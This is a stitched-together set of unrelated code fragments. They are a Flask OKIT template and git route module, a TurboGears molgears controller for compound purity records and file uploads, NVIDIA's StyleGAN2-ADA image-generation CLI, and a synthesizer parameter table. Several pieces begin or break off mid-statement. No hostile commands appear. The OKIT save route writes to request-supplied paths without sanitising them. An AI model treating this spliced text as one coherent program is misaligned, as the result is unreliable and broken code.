'name': os.path.basename(rootdir),
'path': rootdir
}
hierarchy[dkey] = []
hierarchy[fkey] = []
if reltodir is not None:
hierarchy['path'] = os.path.relpath(rootdir, reltodir)
with os.scandir(rootdir) as it:
for entry in it:
if not entry.name.startswith('.'):
if entry.name.endswith('.json') and entry.is_file():
# hierarchy[fkey].append(entry.name)
hierarchy[fkey].append({'id': entry.name.replace('.','_'), 'name': entry.name, 'json': entry.name, 'path': hierarchy['path']})
elif entry.is_dir():
hierarchy[dkey].append(dir_to_json(os.path.join(rootdir, entry.name), reltodir, dkey, fkey))
logger.debug(f'Directory Hierarchy : {jsonToFormattedString(hierarchy)}')
return hierarchy
def hierarchy_category(category, hierarchy, root=''):
logger.debug(f'Category : {jsonToFormattedString(category)}')
logger.debug(f'Hierarchy : {jsonToFormattedString(hierarchy)}')
logger.debug(f'Root : {root}')
for template in hierarchy['templates']:
path = hierarchy['path'] if hierarchy['path'] != '.' else ''
category['templates'].append(get_template_entry(root, path, template['json']))
for child in hierarchy['children']:
category['children'].append(hierarchy_category({"name": os.path.basename(child["path"]).replace("_", " ").title(), "path": child["path"], "id": child["id"], "children": [], "templates": []}, child, root))
return category
def get_template_entry(root, path, json_file):
# json_file = os.path.join(path, template_file)
okit_template = {'path': path, 'json': json_file, 'id': json_file.replace('.', '_').replace('/', '_')}
try:
filename = os.path.join(root, okit_template['path'], okit_template['json'])
template_json = readJsonFile(filename)
logger.debug('Template Json : {0!s:s}'.format(template_json))
okit_template['name'] = template_json['title']
okit_template['description'] = template_json.get('description', template_json['title'])
okit_template['description'] = template_json['title']
except Exception as e:
logger.debug(e)
return okit_template
@bp.route('/templates/load', methods=(['GET']))
def templates():
if request.method == 'GET':
query_string = request.query_string
parsed_query_string = urllib.parse.unquote(query_string.decode())
query_json = json.loads(parsed_query_string)
templates_root = os.path.join(current_app.instance_path, query_json['root_dir'].strip('/'))
templates = dir_to_json(templates_root, current_app.instance_path)
logger.debug(f'Templates : {jsonToFormattedString(templates)}')
return templates
@bp.route('/template/load', methods=(['GET']))
def template_load():
if request.method == 'GET':
query_string = request.query_string
parsed_query_string = urllib.parse.unquote(query_string.decode())
query_json = json.loads(parsed_query_string)
template_file = query_json['template_file']
return send_from_directory(current_app.instance_path, template_file, mimetype='application/json', as_attachment=False)
@bp.route('/template/save', methods=(['POST']))
def template_save():
if request.method == 'POST':
instance_path = current_app.instance_path
root_dir = request.json["root_dir"].strip('/')
template_filename = request.json["template_file"].strip('/')
okit_json = request.json["okit_json"]
git = request.json.get('git', False)
git_commit_msg = request.json.get('git_commit_msg', '')
logger.info(f'Save Template : {root_dir}')
template_dir = os.path.dirname(template_filename)
full_dir = os.path.join(instance_path, root_dir, template_dir)
full_filename = os.path.join(full_dir, os.path.basename(template_filename))
full_filename = os.path.join(instance_path, root_dir, template_filename)
if not os.path.exists(full_dir):
os.makedirs(full_dir, exist_ok=True)
writeJsonFile(okit_json, full_filename)
if git:
top_dir = os.path.normpath(os.path.dirname(template_filename)).split(os.sep)
git_repo_dir = os.path.join(instance_path, root_dir, top_dir[0], top_dir[1])
# while top_dir != '':
# git_repo_dir = os.path.join(instance_path, root_dir, top_dir)
# logger.info(f'Top Dir : {top_dir}')
# top_dir = os.path.dirname(top_dir)
logger.info(f'Git Root Dir : {git_repo_dir}')
repo = Repo(git_repo_dir)
repo.index.add(full_filename)
repo.index.commit("commit changes from okit:" + git_commit_msg)
repo.remotes.origin.pull()
repo.remotes.origin.push()
return template_filename
# Git Processing
@bp.route('/panel/git', methods=(['GET']))
def git_panel():
if request.method == 'GET':
repositories = readGitConfigFile()
git_resources = {}
for repo in repositories:
logger.debug(f'Repo: {jsonToFormattedString(repo)}')
label = repo['label']
branch = repo['branch']
url = repo['url']
parsed_url = giturlparse.parse(url)
logger.debug(f'Parsed Url: {parsed_url}')
git_resource_dir = os.path.join(current_app.instance_path, 'git', parsed_url.resource)
git_repo_dir = os.path.join(git_resource_dir, parsed_url.name)
try:
if os.path.exists(git_repo_dir):
repo = Repo(git_repo_dir)
repo.remotes.origin.pull()
else:
repo = Repo.clone_from(url, git_repo_dir, branch=branch, no_single_branch=True)
repo.remotes.origin.pull()
except Exception as e:
logger.exception(e)
git_resources[parsed_url.resource] = git_resource_dir
git_repositories = []
for git_resource, git_resource_dir in git_resources.items():
repo_templates = dir_to_json(git_resource_dir, current_app.instance_path, 'children', 'templates')
repository = {'name': git_resource, 'path': git_resource_dir, 'children': [], 'templates': []}
git_repositories.append(repo_templates)
#Render The Template
logger.debug(f'Repository: {jsonToFormattedString(git_repositories)}')
return render_template('okit/git_repositories_panel.html', git_repositories=git_repositories)
# Local Filesystem Processing
@bp.route('/panel/local', methods=(['GET']))
def local_panel():
if request.method == 'GET':
local_filesystem_dir = os.path.join(current_app.instance_path, 'local')
local_filesystem = [dir_to_json(local_filesystem_dir, current_app.instance_path, 'children', 'templates')]
#Render The Template
logger.debug(f'Local Filesystem: {jsonToFormattedString(local_filesystem)}')
return render_template('okit/local_panel.html', local_filesystem=local_filesystem)
@bp.route('/propertysheets/<string:sheet>', methods=(['GET']))
def propertysheets(sheet):
return render_template('okit/propertysheets/{0:s}'.format(sheet))
@bp.route('/valueproposition/<string:sheet>', methods=(['GET']))
def valueproposition(sheet):
return render_template('okit/valueproposition/{0:s}'.format(sheet))
@bp.route('/generate/<string:language>/<string:destination>', methods=(['GET', 'POST']))
def generate(language, destination):
logger.info('Language : {0:s} - {1:s}'.format(str(language), str(request.method)))
logger.info('Destination : {0:s} - {1:s}'.format(str(destination), str(request.method)))
logger.debug('JSON : {0:s}'.format(str(request.json)))
if request.method == 'POST':
use_vars = request.json.get("use_variables", True)
try:
if destination == 'git':
git_url, git_branch = request.json['git_repository'].split('*')
parsed_git_url = giturlparse.parse(git_url)
generate_git_dir = os.path.abspath(os.path.join(bp.static_folder, 'git'))
logger.info(generate_git_dir)
if not os.path.exists(generate_git_dir):
os.makedirs(generate_git_dir, | |
if kw.has_key('state') and kw['state'] != u'':
try:
state = str(kw['state'])
state = state.replace(',', '.')
except Exception as msg:
flash(l_(u'Float required: %s' % msg), 'error')
redirect(request.headers['Referer'])
if scompound.state != float(state):
scompound.state = float(state)
schanges += u'; State.[mg]: ' + kw['state']
else:
scompound.state = 0
if kw.has_key('notes') and kw['notes'] != scompound.notes:
scompound.notes = kw['notes']
schanges += u';Notes: ' + kw['notes']
if kw.has_key('priority') and int(kw['priority']) != scompound.priority:
scompound.priority = int(kw['priority'])
schanges += u'; Priority:' + kw['priority']
pcompound = DBSession.query(PCompound).get(scompound.pid)
if pcompound:
pcompound.priority = int(kw['priority'])
phistory = PHistory()
phistory.project = pname
phistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
phistory.user = userid
phistory.status = 'Priority'
phistory.changes = u'Priority: ' + kw['priority']
pcompound.history += [phistory]
DBSession.add(phistory)
try:
reason = kw['reason']
except Exception:
reason = None
pass
if reason and reason != u'':
schanges += u'Warning! Non standard change for the reason:' + reason
new_etap = int(kw['etap'])
new_etap_max = int(kw['etap_max'])
effort = DBSession.query( Efforts ).get(scompound.effort_default)
if new_etap < new_etap_max:
effort.etap = new_etap
effort.etap_max = new_etap_max
scompound.status = DBSession.query( SStatus ).get(2)
scompound.stat2_date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
schanges += u'; Current phase: ' + str(new_etap)
schanges += u'; Number of Phases: ' + str(new_etap_max)
else:
flash(l_(u'Finished etap should be lower than amount of etaps'), 'error')
redirect(request.headers['Referer'])
try:
if kw.has_key('acid'):
kwas = str(kw['acid'])
else:
kwas = str(kw['kwasowa'])
kwas = kwas.replace(',', '.')
kwas = float(kwas)
if kw.has_key('basic'):
zasada = str(kw['basic'])
else:
zasada = str(kw['zasadowa'])
zasada = zasada.replace(',', '.')
zasada = float(zasada)
except Exception as msg:
kwas = None
zasada = None
if scompound.purity:
if scompound.purity[0].type == 'kwasowa' or scompound.purity[0].type == 'acid':
kpurity = scompound.purity[0]
zpurity = scompound.purity[1]
else:
kpurity = scompound.purity[1]
zpurity = scompound.purity[0]
if kwas and kwas >= 0.0:# if not has_permission('odbiorca'):
# flash(l_(u'Permission denied'), 'warning')
# redirect(request.headers['Referer'])
if kpurity.type == 'kwasowa' or kpurity.type == 'acid':
if kpurity.value != kwas:
kpurity.value = kwas
schanges += u'; Acid Purity: ' + str(kwas)
try:
kwas_file = raw_path_basename(kw['file_acid'].filename)
except Exception as msg:
kwas_file = None
pass
if kwas_file:
number = DBSession.query(SFiles).count() + 1
new_kwas_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + kwas_file
new_kwas_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_kwas_file_name)
try:
f = file(f_path, "w")
f.write(kw['file_acid'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile1 = SFiles()
sfile1.name = kwas_file
sfile1.filename = new_kwas_file_name
schanges += '; File for acid analitics: ' + kwas_file + ' (' + new_kwas_file_name + ')'
kpurity.filename = [sfile1]
DBSession.add(sfile1)
if zasada and zasada >= 0.0:
if zpurity.type == 'zasadowa' or zpurity.type == 'basic':
if zpurity.value != zasada:
zpurity.value = zasada
schanges += u'; Basic Purity: ' + str(zasada)
try:
zasada_file = raw_path_basename(kw['file_basic'].filename)
except Exception as msg:
zasada_file = None
pass
if zasada_file:
number = DBSession.query(SFiles).count() + 1
new_zasada_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + zasada_file
new_zasada_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_zasada_file_name)
try:
f = file(f_path, "w")
f.write(kw['file_basic'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile2 = SFiles()
sfile2.name = zasada_file
sfile2.filename = new_zasada_file_name
schanges += '; File for basic analitics: ' + zasada_file + ' (' + new_zasada_file_name +')'
zpurity.filename = [sfile2]
DBSession.add(sfile2)
try:
filename = raw_path_basename(kw['loadfile'].filename)
except Exception as msg:
filename = None
pass
if filename:
number = DBSession.query(SFiles).count() + 1
newfilename = str(number) + '_' + userid + '_' + str(sid) + '_' + filename
newfilename.replace(' ', '_')
f_path = os.path.join(files_dir, newfilename)
try:
f = file(f_path, "w")
f.write(kw['loadfile'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile = SFiles()
sfile.name = filename
sfile.filename = newfilename
if kw['opis']:
sfile.description = kw['opis']
schanges += u' File: ' + filename + u' ( ' + newfilename + u' )'
DBSession.add(sfile)
shistory.changes = schanges
scompound.history += [shistory]
DBSession.add(shistory)
DBSession.flush()
#transaction.commit()
scompound2 = DBSession.query(SCompound).filter_by(id=sid).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
if filename:
sfile2 = [sfile]
sfile2 += scompound2.filename
scompound2.filename = sfile2
flash(l_(u'Task completed successfully'))
else:
shistory.changes = schanges
scompound.history += [shistory]
DBSession.add(shistory)
DBSession.flush()
flash(l_(u'task completed successfully'))
else:
flash(l_(u'Permission denied'), 'warning')
redirect(request.headers['Referer'])
if kw and kw.has_key('come_from'):
come_from = kw['come_from']
else:
come_from = request.headers['Referer']
redirect(come_from)
@expose()
def delfile(self, *args, **kw):
pname = request.environ['PATH_INFO'].split('/')[1]
userid = request.identity['repoze.who.userid']
file_id = int(args[0])
sid = int(args[1])
scompound = DBSession.query(SCompound).filter_by(id=sid).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
if scompound.owner == userid:
shistory = SHistory()
shistory.gid = scompound.mol.gid
shistory.project = pname
shistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
shistory.user = userid
shistory.status = u'Delete File'
file = DBSession.query(SFiles).get(file_id)
shistory.changes = u'Deleted file: %s (%s)' % (file.name, file.filename)
scompound.history += [shistory]
scompound.filename.remove(file)
DBSession.delete(file)
DBSession.add(shistory)
else:
flash(l_(u'Permission denied'), 'warning')
redirect(request.headers['Referer'])
flash(l_(u'Task completed successfully'))
redirect(request.headers['Referer'])
@expose('molgears.templates.users.synthesis.analitics')
def analitics(self, id, *kw):
pname = request.environ['PATH_INFO'].split('/')[1]
id = int(id)
userid = request.identity['repoze.who.userid']
scompound = DBSession.query( SCompound).filter_by(id=id).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
effort = DBSession.query( Efforts ).get(scompound.effort_default)
come_from = request.headers['Referer']
if scompound.owner == userid:
etap_max = effort.etap_max
etap = effort.etap
if etap == (etap_max - 1):
flash(u'Please wait for saving.', 'warning')
return dict(scompound=scompound, kierownik = None, come_from=come_from, page='synthesis', pname=pname)
else:
flash(l_(u'This is not the last etap'), 'error')
redirect('/%s/synthesis' % pname)
else:
flash(l_(u'Permission denied'), 'error')
redirect(request.headers['Referer'])
@expose('')
def save_analitics(self, id, **kw):
pname = request.environ['PATH_INFO'].split('/')[1]
id = int(id)
userid = request.identity['repoze.who.userid']
shistory = SHistory()
shistory.project = pname
shistory.date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
shistory.user = userid
shistory.status = 'Analytics'
scompound = DBSession.query( SCompound).filter_by(id=id).join(SCompound.mol).filter(Compound.project.any(Projects.name==pname)).first()
shistory.gid = scompound.mol.gid
effort = DBSession.query( Efforts ).get(scompound.effort_default)
schanges = u''
if not (effort.etap < effort.etap_max):
flash(l_(u'Etap number error'), 'error') # Błąd: Etap wiekszy lub równy maksymalnej liczbie etapów. Prawdopodobnie analityka już została dodana
redirect('/%s/synthesis' % pname)
etap = effort.etap
next_status = DBSession.query( SStatus ).get(3)
if not scompound.purity:
try:
kwas = str(kw['kwas'])
kwas = kwas.replace(',', '.')
kwas = float(kwas)
zasada = str(kw['zasada'])
zasada = zasada.replace(',', '.')
zasada = float(zasada)
except Exception as msg:
kwas = None
zasada = None
flash(l_(u'Purity error. Float required: %s' % msg), 'error')
redirect(request.headers['Referer'])
if (kwas or zasada) >= 0:
schanges = u'Current phase: ' + str(etap + 1) + u'; Status: ' + str(next_status.name)
if kwas >= 0:
spurity1 = SPurity()
spurity1.value = kwas
spurity1.type = 'acid'
schanges += u'; Acid purity: ' + kw['kwas']
if kw.has_key('retention_kwas') and kw['retention_kwas'] != u'':
retention_kwas = str(kw['retention_kwas']).replace(',', '.')
spurity1.retention_time = float(retention_kwas)
schanges += u'; Retention time (acid): ' + retention_kwas
scompound.purity += [spurity1]
try:
kwas_file = raw_path_basename(kw['kwas_file'].filename)
except Exception as msg:
kwas_file = None
pass
if kwas_file and userid:
number = DBSession.query(SFiles).count() + 1
new_kwas_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + kwas_file
new_kwas_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_kwas_file_name)
try:
f = file(f_path, "w")
f.write(kw['kwas_file'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile1 = SFiles()
sfile1.name = kwas_file
sfile1.filename = new_kwas_file_name
schanges += u'; Acid analytics: ' + kwas_file + u' (' + new_kwas_file_name + u')'
spurity1.filename = [sfile1]
else:
sfile1 = None
else:
spurity1 = None
if zasada >= 0:
spurity2 = SPurity()
spurity2.value = zasada
spurity2.type = 'basic'
schanges += u'; Basic purity: ' + str(kw['zasada'])
if kw.has_key('retention_zasada') and kw['retention_zasada'] != u'':
retention_zasada = str(kw['retention_zasada']).replace(',', '.')
spurity2.retention_time = float(retention_zasada)
schanges += u'; Retention time (basic): ' + retention_zasada
scompound.purity += [spurity2]
try:
zasada_file = raw_path_basename(kw['zasada_file'].filename)
except Exception as msg:
zasada_file = None
pass
if zasada_file and userid:
number = DBSession.query(SFiles).count() + 1
new_zasada_file_name = str(number) + '_' + userid + '_' + str(id) + '_' + zasada_file
new_zasada_file_name.replace(' ', '_')
f_path = os.path.join(files_dir, new_zasada_file_name)
try:
f = file(f_path, "w")
f.write(kw['zasada_file'].value)
f.close()
except Exception as msg:
flash(l_(msg), 'error')
redirect(request.headers['Referer'])
sfile2 = SFiles()
sfile2.name = zasada_file
sfile2.filename = new_zasada_file_name
schanges += u'; Basic analtytics: ' + zasada_file + ' (' + new_zasada_file_name +')'
spurity2.filename = [sfile2]
else:
sfile2 = None
else:
spurity2 = None
else:
flash(l_(u'Acid or Basic purity is required'), 'error')
redirect(request.headers['Referer'])
else:
spurity2 = None
spurity1 = None
if not kw['lso']:
flash(l_(u'LSO is required'), 'error')
redirect(request.headers['Referer'])
if kw.has_key('lso') and kw['lso'] != u'' and kw['lso'].upper() != scompound.lso:
scompound.lso = kw['lso'].upper()
schanges += u' LSO: ' + kw['lso']
if kw.has_key('form') and kw['form'] != scompound.form:
scompound.form = kw['form']
schanges += u'; Form: ' + kw['form']
if kw.has_key('state') and kw['state'] | |
<reponame>wenhaoyong/stylegan2-ada-pytorch
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Generate images using pretrained network pickle."""
import os
from typing import List, Optional, Union, Tuple
import click
import dnnlib
from torch_utils.gen_utils import num_range, parse_fps, compress_video, double_slowdown, \
make_run_dir, z_to_img, w_to_img, get_w_from_file, create_image_grid, save_config, parse_slowdown, get_w_from_seed
import scipy
import numpy as np
import PIL.Image
import torch
import legacy
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'
import moviepy.editor
# ----------------------------------------------------------------------------
# We group the different types of generation (images, grid, video, wacky stuff) into a main function
@click.group()
def main():
pass
# ----------------------------------------------------------------------------
@main.command(name='images')
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--recreate-snapshot-grid', 'training_snapshot', is_flag=True, help='Add flag if you wish to recreate the snapshot grid created during training')
@click.option('--snapshot-size', type=click.Choice(['1080p', '4k', '8k']), help='Size of the snapshot', default='4k', show_default=True)
@click.option('--seeds', type=num_range, help='List of random seeds')
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--projected-w', help='Projection result file; can be either .npy or .npz files', type=click.Path(exists=True, dir_okay=False), metavar='FILE')
@click.option('--save-grid', help='Use flag to save image grid', is_flag=True, show_default=True)
@click.option('--grid-width', '-gw', type=int, help='Grid width (number of columns)', default=None)
@click.option('--grid-height', '-gh', type=int, help='Grid height (number of rows)', default=None)
@click.option('--outdir', type=click.Path(file_okay=False), help='Directory path to save the results', default=os.path.join(os.getcwd(), 'out'), show_default=True, metavar='DIR')
@click.option('--description', '-desc', type=str, help='Description name for the directory path to save results', default='generate-images', show_default=True)
def generate_images(
ctx: click.Context,
network_pkl: str,
training_snapshot: bool,
snapshot_size: str,
seeds: Optional[List[int]],
truncation_psi: float,
noise_mode: str,
save_grid: bool,
grid_width: int,
grid_height: int,
outdir: str,
description: str,
class_idx: Optional[int],
projected_w: Optional[Union[str, os.PathLike]]
):
"""Generate images using pretrained network pickle.
Examples:
\b
# Generate curated MetFaces images without truncation (Fig.10 left)
python generate.py generate-images --trunc=1 --seeds=85,265,297,849 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate uncurated MetFaces images with truncation (Fig.12 upper left)
python generate.py generate-images --trunc=0.7 --seeds=600-605 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate class conditional CIFAR-10 images (Fig.17 left, Car)
python generate.py generate-images --seeds=0-35 --class=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/cifar10.pkl
\b
# Render an image from projected W
python generate.py generate-images --projected_w=projected_w.npz \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print(f'Loading networks from "{network_pkl}"...')
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
description = 'generate-images' if len(description) == 0 else description
# Create the run dir with the given name description
run_dir = make_run_dir(outdir, description)
# Synthesize the result of a W projection.
if projected_w is not None:
if seeds is not None:
print('warn: --seeds is ignored when using --projected-w')
print(f'Generating images from projected W "{projected_w}"')
ws, ext = get_w_from_file(projected_w, return_ext=True)
ws = torch.tensor(ws, device=device)
assert ws.shape[1:] == (G.num_ws, G.w_dim)
n_digits = int(np.log10(len(ws))) + 1 # number of digits for naming the .jpg images
if ext == '.npy':
img = w_to_img(G, ws, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(f'{run_dir}/proj.jpg')
else:
for idx, w in enumerate(ws):
img = w_to_img(G, w, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(f'{run_dir}/proj{idx:0{n_digits}d}.jpg')
return
# Labels.
label = torch.zeros([1, G.c_dim], device=device)
if G.c_dim != 0:
if class_idx is None:
ctx.fail('Must specify class label with --class when using a conditional network')
label[:, class_idx] = 1
else:
if class_idx is not None:
print('warn: --class=lbl ignored when running on an unconditional network')
if training_snapshot:
# Note: this doesn't really work, so more work is warranted
print('Recreating the snapshot grid...')
size_dict = {'1080p': (1920, 1080, 3, 2), '4k': (3840, 2160, 7, 4), '8k': (7680, 4320, 7, 4)}
grid_width = int(np.clip(size_dict[snapshot_size][0] // G.img_resolution, size_dict[snapshot_size][2], 32))
grid_height = int(np.clip(size_dict[snapshot_size][1] // G.img_resolution, size_dict[snapshot_size][3], 32))
num_images = grid_width * grid_height
rnd = np.random.RandomState(0)
torch.manual_seed(0)
all_indices = list(range(70000)) # irrelevant
rnd.shuffle(all_indices)
grid_z = rnd.randn(num_images, G.z_dim) # TODO: generate with torch, as in the training_loop.py file
grid_img = z_to_img(G, torch.from_numpy(grid_z).to(device), label, truncation_psi, noise_mode)
PIL.Image.fromarray(create_image_grid(grid_img, (grid_width, grid_height)),
'RGB').save(os.path.join(run_dir, 'fakes.jpg'))
print('Saving individual images...')
for idx, z in enumerate(grid_z):
z = torch.from_numpy(z).unsqueeze(0).to(device)
w = G.mapping(z, None) # to save the dlatent in .npy format
img = z_to_img(G, z, label, truncation_psi, noise_mode)[0]
PIL.Image.fromarray(img, 'RGB').save(os.path.join(run_dir, f'img{idx:04d}.jpg'))
np.save(os.path.join(run_dir, f'img{idx:04d}.npy'), w.unsqueeze(0).cpu().numpy())
else:
if seeds is None:
ctx.fail('--seeds option is required when not using --projected-w')
# Generate images.
images = []
for seed_idx, seed in enumerate(seeds):
print('Generating image for seed %d (%d/%d) ...' % (seed, seed_idx, len(seeds)))
z = torch.from_numpy(np.random.RandomState(seed).randn(1, G.z_dim)).to(device)
img = z_to_img(G, z, label, truncation_psi, noise_mode)[0]
if save_grid:
images.append(img)
PIL.Image.fromarray(img, 'RGB').save(os.path.join(run_dir, f'seed{seed:04d}.jpg'))
if save_grid:
print('Saving image grid...')
# We let the function infer the shape of the grid
if (grid_width, grid_height) == (None, None):
PIL.Image.fromarray(create_image_grid(np.array(images)),
'RGB').save(os.path.join(run_dir, 'grid.jpg'))
# The user tells the specific shape of the grid, but one value may be None
else:
PIL.Image.fromarray(create_image_grid(np.array(images), (grid_width, grid_height)),
'RGB').save(os.path.join(run_dir, 'grid.jpg'))
# Save the configuration used
ctx.obj = {
'network_pkl': network_pkl,
'training_snapshot': training_snapshot,
'snapshot_size': snapshot_size,
'seeds': seeds,
'truncation_psi': truncation_psi,
'class_idx': class_idx,
'noise_mode': noise_mode,
'save_grid': save_grid,
'grid_width': grid_width,
'grid_height': grid_height,
'run_dir': run_dir,
'description': description,
'projected_w': projected_w
}
save_config(ctx=ctx, run_dir=run_dir)
# ----------------------------------------------------------------------------
def _parse_new_center(s: str) -> Tuple[str, Union[int, np.ndarray]]:
"""Get a new center for the W latent space (a seed or projected dlatent; to be transformed later)"""
try:
new_center = int(s) # it's a seed
return s, new_center
except ValueError:
new_center = get_w_from_file(s) # it's a projected dlatent
return s, new_center
@main.command(name='random-video')
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--seeds', type=num_range, help='List of random seeds', required=True)
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--new-center', type=_parse_new_center, help='New center for the W latent space; a seed (int) or a path to a projected dlatent (.npy/.npz)', default=None)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--grid-width', '-gw', type=int, help='Video grid width / number of columns', default=None, show_default=True)
@click.option('--grid-height', '-gh', type=int, help='Video grid height / number of rows', default=None, show_default=True)
@click.option('--slowdown', type=parse_slowdown, help='Slow down the video by this amount; will be approximated to the nearest power of 2', default='1', show_default=True)
@click.option('--duration-sec', '-sec', type=float, help='Duration length of the video', default=30.0, show_default=True)
@click.option('--fps', type=parse_fps, help='Video FPS.', default=30, show_default=True)
@click.option('--compress', is_flag=True, help='Add flag to compress the final mp4 file with ffmpeg-python (same resolution, lower file size)')
@click.option('--outdir', type=click.Path(file_okay=False), help='Directory path to save the results', default=os.path.join(os.getcwd(), 'out'), show_default=True, metavar='DIR')
@click.option('--description', '-desc', type=str, help='Description name for the directory path to save results', default='', show_default=True)
def random_interpolation_video(
ctx: click.Context,
network_pkl: Union[str, os.PathLike],
seeds: Optional[List[int]],
truncation_psi: float,
new_center: Tuple[str, Union[int, np.ndarray]],
class_idx: Optional[int],
noise_mode: str,
grid_width: int,
grid_height: int,
slowdown: int,
duration_sec: float,
fps: int,
outdir: Union[str, os.PathLike],
description: str,
compress: bool,
smoothing_sec: Optional[float] = 3.0 # for Gaussian blur; won't be a parameter, change at own risk
):
"""
Generate a random interpolation video using a pretrained network.
Examples:
\b
# Generate a 30-second long, untruncated MetFaces video at 30 FPS (3 rows and 2 columns; horizontal):
python generate.py random-video --seeds=0-5 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate a 60-second long, truncated 1x2 MetFaces video at 60 FPS (2 rows and 1 column; vertical):
python generate.py random-video --trunc=0.7 --seeds=10,20 --grid-width=1 --grid-height=2 \\
--fps=60 -sec=60 --network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print(f'Loading networks from "{network_pkl}"...')
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
# Create the run dir with the given name description; add slowdown if different than the default (1)
description = 'random-video' if len(description) == 0 else description
description = f'{description}-{slowdown}xslowdown' if slowdown != 1 else description
run_dir = make_run_dir(outdir, description)
# Number of frames in the video and its total duration in seconds
num_frames = int(np.rint(duration_sec * fps))
total_duration = duration_sec * slowdown
print('Generating latent vectors...')
# TODO: let another helper function handle each case, we will use it for the grid
# If there's more than one seed provided and the shape isn't specified by the user
if (grid_width is None and grid_height is None) and len(seeds) >= 1:
# TODO: this can be done by another function
# Number of images in the grid video according to the seeds provided
num_seeds = len(seeds)
# Get the grid width and height according to num, giving priority to the number of columns
grid_width = max(int(np.ceil(np.sqrt(num_seeds))), 1)
grid_height = max((num_seeds - 1) // grid_width + 1, 1)
grid_size = (grid_width, grid_height)
shape = [num_frames, G.z_dim] # This is per seed
# Get the z latents
all_latents = | |
0~19 | DELAY SUB TYPE *note P17 |
+---------+-------+---------+---------------------------------------------+
| 101 | L:0~7 | 0~1023 | DELAY TIME |
| 102 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 103 | L:0~7 | 0~1023 | DELAY DEPTH |
| 104 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 105 | | 0,1 | REVERB ON/OFF 0,1=Off,On |
+---------+-------+---------+---------------------------------------------+
| 106 | | 0~19 | REVERB SUB TYPE *note P18 |
+---------+-------+---------+---------------------------------------------+
| 107 | L:0~7 | 0~1023 | REVERB TIME |
| 108 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 109 | L:0~7 | 0~1023 | REVERB DEPTH |
| 110 | H:0~1 | | |
+---------+-------+---------+---------------------------------------------+
| 111 | | 0~12 | BEND RANGE (+) OFF~+12Note |
+---------+-------+---------+---------------------------------------------+
| 112 | | 0~12 | BEND RANGE (-) OFF~-12Note |
+---------+-------+---------+---------------------------------------------+
| 113 | | 0~28 | JOYSTICK ASSIGN (+) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 114 | | 0~200 | JOYSTICK RANGE (+) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 115 | | 0~28 | JOYSTICK ASSIGN (-) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 116 | | 0~200 | JOYSTICK RANGE (-) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 117 | | 0~2 | CV IN MODE *note P20 |
+---------+-------+---------+---------------------------------------------+
| 118 | | 0~28 | CV IN 1 ASSIGN (+) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 119 | | 0~200 | CV IN 1 RANGE (+) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
| 120 | | 0~28 | CV IN 2 ASSIGN (-) *note P19 |
+---------+-------+---------+---------------------------------------------+
| 121 | | 0~200 | CV IN 2 RANGE (-) 0~200=-100%~+100% |
+---------+-------+---------+---------------------------------------------+
